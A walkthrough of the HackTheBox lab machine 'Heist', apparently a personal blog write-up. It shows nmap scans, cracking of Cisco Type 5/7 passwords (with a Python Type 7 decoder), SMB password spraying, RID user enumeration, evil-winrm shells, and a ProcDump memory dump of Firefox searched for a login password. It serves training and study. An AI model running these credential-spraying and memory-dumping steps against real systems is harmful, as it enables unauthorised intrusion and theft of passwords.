
Heist Writeup

Machine Info

Machine Description
Name: Heist
OS: Windows
Difficulty: Easy
Author: MinatoTW

Recon

Service scan

┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Heist]
└─$ sudo nmap -p- -Pn --min-rate 6969 10.129.96.157
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-23 03:32 EST
Nmap scan report for 10.129.96.157
Host is up (0.056s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
5985/tcp  open  wsman
49669/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 19.00 seconds

┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Heist]
└─$ sudo nmap -p80,135,445,5985,49669 -sCV -Pn 10.129.96.157
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-23 03:55 EST
Nmap scan report for 10.129.96.157
Host is up (0.056s latency).

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-title: Support Login Page
|_Requested resource was login.php
| http-methods:
|_  Potentially risky methods: TRACE
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2024-12-23T08:56:19
|_  start_date: N/A
|_clock-skew: -1s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.31 seconds

The scan shows five open ports on the target: HTTP, SMB, WinRM (5985), and one that doesn't matter. The HTTP server is IIS 10.0, so the system is presumably Windows 10 (or Server 2016); further down, the cookie is PHPSESSID, so the backend is PHP.

HTTP - Port 80

Since the site's hostname is unknown, I browsed straight to the IP.

The server redirects to /login.php. There is no way to register an account, so I used "Login as guest" in the lower left to log in as a guest.

This shows that the user Hazard couldn't get a Cisco router configured properly and asked Support for help, attaching the config file (under Attachment).

Other things done at this stage
  1. Black-box testing of the web app found no weakness, and the backend has no database at all.
  2. Since the target's domain name is unknown, I could only guess the account was [email protected] and try brute-forcing it; that failed.

Cracking the Cisco passwords

Naturally, let's see what's in the config file!

It contains usernames and password hashes.

security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408

If you've never worked with Cisco networking gear, this may be where it gets hard to continue, but you should at least be able to guess that the hashes need to be cracked; after all, $1$... is obviously an MD5 hash.

A word on the config file

Two password storage schemes are used: Type 5, an MD5-based hash (secret 5), and Type 7, a Vigenère-style cipher (password 7). Both are weak: MD5 can be brute-forced offline, and the Type 7 cipher is XOR-based and can be reversed directly.

For the other Cisco password types, see the KB.

As for how I knew this kind of Cisco password could be cracked: at a job long ago I had to take over a predecessor's mess, with no handover of any credentials. Luckily the gear was old enough to crack QQ

Simply searching the hash online yields the first password.

For the other two Type 7 strings, you can use a decoding script from GitHub, or, if you're lazy, a website like this one can recover the password.

Using a script is the better choice; you never know whether a website is harvesting the passwords you paste in.

$1$pdQG$o8nrSzsGXeaduXrjlvKc91:stealth1agent
0242114B0E143F015F5D1E161713:$uperP@ssword
02375012182C1A1D751618034F36415408:Q4)sJu\Y8qz*A3?d
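As an added example (not from the original writeup), here is a small config auditor written from the defender's side: it walks an IOS config, flags every `secret 5` / `password 7` line as a finding, and for Type 7 shows why by reversing it with the long-public XOR keystream. The config text is a constructed sample built from the lines quoted above plus one assumed `secret 9` line to show a passing entry.

```python
import re

# Cisco IOS Type 7 XOR keystream. It has been public for decades, which is exactly
# why a "password 7" line is an audit finding rather than protection.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv"

# Constructed sample config: the lines from the Heist attachment plus one assumed
# Type 9 (scrypt) entry so the auditor has a passing line to contrast with.
SAMPLE_CONFIG = """\
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
username ops secret 9 $9$placeholder-scrypt-hash
"""

# Storage types an audit should flag; Type 8 (PBKDF2-SHA256) and 9 (scrypt) pass.
WEAK_TYPES = {
    "5": "Type 5 md5crypt: offline-crackable, migrate to Type 8/9",
    "7": "Type 7: reversible XOR, plaintext recoverable from the config alone",
}

LINE_RE = re.compile(
    r"^(?:username\s+(\S+).*?|enable)\s+(password|secret)\s+(\d)\s+(\S+)", re.M
)

def type7_reverse(encoded: str) -> str:
    """Reverse a Type 7 string: two decimal digits give the keystream offset,
    the rest is hex, each byte XORed with the keystream at offset + position."""
    if len(encoded) < 4 or len(encoded) % 2:
        raise ValueError("malformed Type 7 string")
    offset = int(encoded[:2], 10)
    data = bytes.fromhex(encoded[2:])
    return "".join(
        chr(b ^ TYPE7_KEY[(offset + i) % len(TYPE7_KEY)]) for i, b in enumerate(data)
    )

def audit_config(config: str) -> list[dict]:
    """One finding per credential line; Type 7 findings carry the recovered value
    so the config owner can see the exposure is real, not theoretical."""
    findings = []
    for m in LINE_RE.finditer(config):
        user, _kind, ptype, value = m.groups()
        f = {"account": user or "enable", "type": ptype, "weak": ptype in WEAK_TYPES,
             "note": WEAK_TYPES.get(ptype, "ok: Type 8/9 is not reversible")}
        if ptype == "7":
            f["plaintext"] = type7_reverse(value)
        findings.append(f)
    return findings
```

Running `audit_config(SAMPLE_CONFIG)` flags the enable secret and both user lines and leaves only the Type 9 entry clean, which is the outcome a config review should demand before a router config is attached to a ticket.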

Password spraying Part 1

Using the collected usernames and passwords, try every combination.

Hazard
hazard
admin
Admin
Administrator
administrator
rout3r
support
support_admin
stealth1agent
$uperP@ssword
Q4)sJu\Y8qz*A3?d

WinRM turned up nothing, but SMB hit!

┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Heist]
└─$ netexec smb 10.129.96.157 -u user.txt -p pass.txt

SMB         10.129.96.157   445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.129.96.157   445    SUPPORTDESK      [+] SupportDesk\Hazard:stealth1agen

Got Hazard's password!

SupportDesk\Hazard:stealth1agent

Internal recon Part 1

SMB share listing

No luck; nothing readable.

┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Heist]
└─$ netexec smb 10.129.96.157 -u Hazard -p stealth1agent --shares
SMB         10.129.96.157   445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.129.96.157   445    SUPPORTDESK      [+] SupportDesk\Hazard:stealth1agent
SMB         10.129.96.157   445    SUPPORTDESK      [*] Enumerated shares
SMB         10.129.96.157   445    SUPPORTDESK      Share           Permissions     Remark
SMB         10.129.96.157   445    SUPPORTDESK      -----           -----------     ------
SMB         10.129.96.157   445    SUPPORTDESK      ADMIN$                          Remote Admin
SMB         10.129.96.157   445    SUPPORTDESK      C$                              Default share
SMB         10.129.96.157   445    SUPPORTDESK      IPC$            READ            Remote IPC

RID user enumeration

After many attempts, I found that only RID brute-forcing successfully enumerated the users.

┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Heist]
└─$ netexec smb 10.129.96.157 -u Hazard -p stealth1agent --rid-brute
SMB         10.129.96.157   445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.129.96.157   445    SUPPORTDESK      [+] SupportDesk\Hazard:stealth1agent
SMB         10.129.96.157   445    SUPPORTDESK      500: SUPPORTDESK\Administrator (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      501: SUPPORTDESK\Guest (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      503: SUPPORTDESK\DefaultAccount (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      513: SUPPORTDESK\None (SidTypeGroup)
SMB         10.129.96.157   445    SUPPORTDESK      1008: SUPPORTDESK\Hazard (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      1009: SUPPORTDESK\support (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      1012: SUPPORTDESK\Chase (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      1013: SUPPORTDESK\Jason (SidTypeUser)

New accounts found! Collected into a new user list.

Administrator
support
Chase
Jason
None
Guest
DefaultAccount
WDAGUtilityAccount

Password spraying Part 2

Try every combination again.

┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Heist]
└─$ netexec smb 10.129.96.157 -u user2.txt -p pass.txt --continue-on-success
SMB         10.129.96.157   445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Administrator:stealth1agent STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\support:stealth1agent STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Chase:stealth1agent STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Jason:stealth1agent STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\None:stealth1agent STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Guest:stealth1agent STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\DefaultAccount:stealth1agent STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\WDAGUtilityAccount:stealth1agent STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Administrator:$uperP@ssword STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\support:$uperP@ssword STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Chase:$uperP@ssword STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Jason:$uperP@ssword STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\None:$uperP@ssword STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Guest:$uperP@ssword STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\DefaultAccount:$uperP@ssword STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\WDAGUtilityAccount:$uperP@ssword STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Administrator:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\support:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Jason:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] Connection Error: Error occurs while reading from remote(104)
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Guest:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\DefaultAccount:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\WDAGUtilityAccount:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE

Hit! Got Chase's password.

SupportDesk\Hazard:stealth1agent
SupportDesk\Chase:Q4)sJu\Y8qz*A3?d

WinRM login as Chase

Since Hazard

┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Heist]
└─$ evil-winrm -i 10.129.96.157 -u Chase -p "Q4)sJu\Y8qz*A3?d"

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chase\Documents> type ..\Desktop\user.txt
0e6d4756a8bd6019369427c72e67a0b7

Internal recon Part 2

Look around for other interesting files.

*Evil-WinRM* PS C:\Users\Chase\Desktop> dir


    Directory: C:\Users\Chase\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/22/2019   9:08 AM            121 todo.txt
-ar---       12/23/2024   1:59 PM             34 user.txt


*Evil-WinRM* PS C:\Users\Chase\Desktop> type tod*
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.

Done:
1. Restricted access for guest user.

Reading todo.txt on the Desktop shows that the administrator regularly checks the issues, i.e. the page where the Cisco config was obtained earlier.

Website source code

After cd'ing into C:\inetpub\, I found there is no permission to list the directory (dir fails), but files can still be read directly by guessing their names, such as login.php.

*Evil-WinRM* PS C:\inetpub\wwwroot> type lo*
<!DOCTYPE html>
<html lang="en" >
...
<?php
session_start();
if( isset($_REQUEST['login']) && !empty($_REQUEST['login_username']) && !empty($_REQUEST['login_password'])) {
        if( $_REQUEST['login_username'] === '[email protected]' && hash( 'sha256', $_REQUEST['login_password']) === '91c077fb5bcdd1eacf7268c945bc1d1ce2faf9634cba615337adbf0af4db9040') {
                $_SESSION['admin'] = "valid";
                header('Location: issues.php');
        }
        else
                header('Location: errorpage.php');
}
else if( isset($_GET['guest']) ) {
        if( $_GET['guest'] === 'true' ) {
                $_SESSION['guest'] = "valid";
                header('Location: issues.php');
        }
}
?>
</html>

This yields the sha256 hash of admin's password. I didn't want to brute-force it, since that usually gets nowhere; if no other path turns up, it's never too late to come back to it.

Process listing

Finally, under C:\Program Files\ I noticed Firefox is installed on this machine. Could the administrator be using this very machine to view the issues? So I listed the currently running processes.

*Evil-WinRM* PS C:\Users\Chase\Documents> Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id

ProcessName           Id
-----------           --
csrss                360
csrss                476
ctfmon              2120
dllhost             3852
dllhost             6772
dwm                  952
explorer             948
firefox             4364
firefox             6460
firefox             6568
firefox             6704
firefox             6980
...

And there it was.

Dumping Firefox's memory

There are countless ways to dump memory; here I used Microsoft's ProcDump [1] to capture the memory of the newest Firefox process.

*Evil-WinRM* PS C:\Users\Chase\Documents> upload /home/kali/Documents/tools/procdump.exe

Info: Uploading /home/kali/Documents/tools/procdump.exe to C:\Users\Chase\Documents\procdump.exe

Data: 1055944 bytes of 1055944 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\Chase\Documents> ./procdump.exe -accepteula
...
*Evil-WinRM* PS C:\Users\Chase\Documents> ./procdump.exe -ma 6980

ProcDump v11.0 - Sysinternals process dump utility
Copyright (C) 2009-2022 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[16:47:30] Dump 1 initiated: C:\Users\Chase\Documents\firefox.exe_241223_164730.dmp
[16:47:31] Dump 1 writing: Estimated dump file size is 307 MB.
[16:47:32] Dump 1 complete: 308 MB written in 1.4 seconds
[16:47:32] Dump count reached.

Filtering the memory contents

Firefox's memory holds the user's browsing history and may contain sensitive information. From the login.php source reviewed earlier, the password is submitted as login_password=<PASSWORD>, so I filtered the dump for that pattern.

┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Heist]
└─$ rg -ao 'login_password=([^&]+)' firefox.exe_241223_164730.dmp
2696:login_password=4dD!5}x/re8]FBuZ
2896:login_password=4dD!5}x/re8]FBuZ
2896:login_password=4dD!5}x/re8]FBuZ

Successfully obtained the administrator's password.

Log in as Administrator

┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Heist]
└─$ evil-winrm -i 10.129.96.157 -u Administrator -p "4dD\!5}x/re8]FBuZ"

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Des*/*.txt
e3254f34e1f191af2cefaf1f4a8b6224

  1. A Microsoft-signed native tool that can capture a process's memory contents. Sysinternals - ProcDump, Microsoft


Last update: 2024-12-24 Created: 2024-12-24